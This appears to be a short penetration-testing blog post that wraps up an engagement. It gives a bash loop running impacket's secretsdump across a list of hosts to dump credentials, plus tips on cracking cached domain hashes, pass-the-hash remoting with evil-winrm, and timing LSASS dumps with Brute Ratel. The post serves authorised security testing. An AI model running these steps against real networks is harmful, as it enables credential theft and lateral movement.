Aug 19, 2022
Hey friends, today we share the (hopefully) thrilling conclusion of last week's pentest. Here are some key points:
#!/bin/bash File="localadmin.txt" Lines=$(cat $File) for Line in $Lines do echo --- $Line --- >> dump.txt echo --------------------- >> dump.txt sudo python3 /opt/impacket/examples/secretsdump.py -k "$Line" >> dump.txt echo --------------------- >> dump.txt done
From those dumps you can definitely try to crack the DCC hashes using a local or cloud cracker - see our series on this topic for some guidance.
Got an NTLM hash for a privileged user and want to PS remote into a victim system? You can essentially do a PowerShell login pass-the-hash with evil-winrm!
The Brute Ratel crisis monitor is awesome for watching a box and monitoring for people logging in and out of it (perfect for getting ready to strike with lsass dumps!)